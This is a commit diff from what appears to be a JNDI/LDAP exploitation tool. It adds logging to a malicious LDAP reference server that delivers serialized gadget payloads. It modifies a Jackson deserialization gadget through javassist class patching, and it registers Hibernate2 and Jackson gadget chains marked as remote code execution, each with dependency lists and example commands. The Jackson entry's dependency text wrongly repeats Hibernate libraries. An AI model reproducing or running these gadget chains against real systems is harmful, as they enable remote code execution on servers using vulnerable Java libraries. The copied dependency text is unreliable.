fix deserial return no log info

Author: cckuailong

src/main/java/jndi/LDAPRefServer.java

@@ -200,6 +200,7 @@ protected void sendResult ( InMemoryInterceptedSearchResult result, String base,
 
                 String gadgetType = javaFactory.substring(8);
                 byte[] bytes = commonDeserial.execByDeserialize(gadgetType, null);
+                System.out.printf("%s [LDAPSERVER] [%s] >> Send local LDAP reference result\n", getLocalTime(), javaFactory);
                 e.addAttribute("javaClassName", "foo");
                 e.addAttribute("javaSerializedData", bytes);
             }

src/main/java/payloads/Jackson.java

@@ -16,15 +16,21 @@
 @Dependencies({"com.fasterxml.jackson.core:jackson-databind:2.14.2"})
 @Authors({Authors.Y4ER})
 public class Jackson implements ObjectPayload<Object> {
-
+    private  static boolean init =false;
     public Object getObject(final String command) throws Exception {
         final Object template = Gadgets.createTemplatesImpl(command);
 
-        CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode");
-        CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
-        ctClass.removeMethod(writeReplace);
+        if (init == false)
+        {
+            init = true;
+            CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode");
+            CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
+            ctClass.removeMethod(writeReplace);
+            ctClass.toClass();
+        }
+
         // 将修改后的CtClass加载至当前线程的上下文类加载器中
-        ctClass.toClass();
+
 
         POJONode node = new POJONode(template);
 

src/main/java/util/Mapper.java

@@ -65,6 +65,8 @@ public class Mapper {
         references2.put("deserialFileUpload1", "deserialFileUpload1");
         references2.put("deserialGroovy1", "deserialGroovy1");
         references2.put("deserialHibernate1", "deserialHibernate1");
+        references2.put("deserialHibernate2", "deserialHibernate2");
+        references2.put("deserialJackson", "deserialJackson");
         references2.put("deserialJavassistWeld1", "deserialJavassistWeld1");
         references2.put("deserialJBossInterceptors1", "deserialJBossInterceptors1");
         references2.put("deserialJSON1", "deserialJSON1");
@@ -98,6 +100,8 @@ public class Mapper {
         instructions2.put("deserialFileUpload1", withColor("[WriteFile]", ANSI_YELLOW) + withColor(" FileUpload1", ANSI_GREEN) + withColor("\n  <Dependencies>: { commons-fileupload:commons-fileupload:1.3.1, commons-io:commons-io:2.4 }", ANSI_RED) + withColor("\n  <Example CMD> : 'copyAndDelete;sourceFile;destDir'\n                  'write;destDir;ascii-data'\n                  'writeB64;destDir;base64-data'\n                  'writeOld;destFile;ascii-data'\n                  'writeOldB64;destFile;base64-data'", ANSI_BLUE));
         instructions2.put("deserialGroovy1", withColor("[RCE]", ANSI_YELLOW) + withColor(" Groovy1", ANSI_GREEN) + withColor("\n  <Dependencies>: { org.codehaus.groovy:groovy:2.3.9 }", ANSI_RED) + withColor("\n  <Example CMD> : '/System/Applications/Calculator.app/Contents/MacOS/Calculator'", ANSI_BLUE));
         instructions2.put("deserialHibernate1", withColor("[RCE]", ANSI_YELLOW) + withColor(" Hibernate1", ANSI_GREEN) + withColor("\n  <Dependencies>: { JRE >= 7, org.hibernate:hibernate-core:5.0.7.Final, aopalliance:aopalliance:1.0, org.jboss.logging:jboss-logging:3.3.0.Final, javax.transaction:javax.transaction-api:1.2 }\n                  { JRE > 7, org.hibernate:hibernate-core:4.3.11.Final, aopalliance:aopalliance:1.0, org.jboss.logging:jboss-logging:3.3.0.Final, javax.transaction:javax.transaction-api:1.2, dom4j:dom4j:1.6.1 }", ANSI_RED) + withColor("\n  <Example CMD> : '/System/Applications/Calculator.app/Contents/MacOS/Calculator'", ANSI_BLUE));
+        instructions2.put("deserialHibernate2", withColor("[RCE]", ANSI_YELLOW) + withColor(" Hibernate2", ANSI_GREEN) + withColor("\n  <Dependencies>: { JRE >= 7, org.hibernate:hibernate-core:5.0.7.Final, aopalliance:aopalliance:1.0, org.jboss.logging:jboss-logging:3.3.0.Final, javax.transaction:javax.transaction-api:1.2 }\n                  { JRE > 7, org.hibernate:hibernate-core:4.3.11.Final, aopalliance:aopalliance:1.0, org.jboss.logging:jboss-logging:3.3.0.Final, javax.transaction:javax.transaction-api:1.2, dom4j:dom4j:1.6.1 }", ANSI_RED) + withColor("\n  <Example CMD> : '/System/Applications/Calculator.app/Contents/MacOS/Calculator'", ANSI_BLUE));
+        instructions2.put("deserialJackson", withColor("[RCE]", ANSI_YELLOW) + withColor(" Jackson", ANSI_GREEN) + withColor("\n  <Dependencies>: { com.fasterxml.jackson.core:jackson-databind:2.14.2 }\n                  { JRE > 7, org.hibernate:hibernate-core:4.3.11.Final, aopalliance:aopalliance:1.0, org.jboss.logging:jboss-logging:3.3.0.Final, javax.transaction:javax.transaction-api:1.2, dom4j:dom4j:1.6.1 }", ANSI_RED) + withColor("\n  <Example CMD> : '/System/Applications/Calculator.app/Contents/MacOS/Calculator'", ANSI_BLUE));
         instructions2.put("deserialJavassistWeld1", withColor("[RCE]", ANSI_YELLOW) + withColor(" JavassistWeld1", ANSI_GREEN) + withColor("\n  <Dependencies>: { JRE >= 7, javassist:javassist:3.12.1.GA, org.jboss.weld:weld-core:1.1.33.Final, javax.enterprise:cdi-api:1.0-SP1, javax.interceptor:javax.interceptor-api:3.1, org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final, org.slf4j:slf4j-api:1.7.21 }", ANSI_RED) + withColor("\n  <Example CMD> : '/System/Applications/Calculator.app/Contents/MacOS/Calculator'", ANSI_BLUE));
         instructions2.put("deserialJBossInterceptors1", withColor("[RCE]", ANSI_YELLOW) + withColor(" JBossInterceptors1", ANSI_GREEN) + withColor("\n  <Dependencies>: { JRE >= 7, javassist:javassist:3.12.1.GA, org.jboss.interceptor:jboss-interceptor-core:2.0.0.Final, javax.enterprise:cdi-api:1.0-SP1, javax.interceptor:javax.interceptor-api:3.1, org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final, org.slf4j:slf4j-api:1.7.21 }", ANSI_RED) + withColor("\n  <Example CMD> : '/System/Applications/Calculator.app/Contents/MacOS/Calculator'", ANSI_BLUE));
         instructions2.put("deserialJSON1", withColor("[RCE]", ANSI_YELLOW) + withColor(" JSON1", ANSI_GREEN) + withColor("\n  <Dependencies>: { net.sf.json-lib:json-lib:jar:jdk15:2.4, org.springframework:spring-aop:4.1.4.RELEASE }", ANSI_RED) + withColor("\n  <Example CMD> : '/System/Applications/Calculator.app/Contents/MacOS/Calculator'", ANSI_BLUE));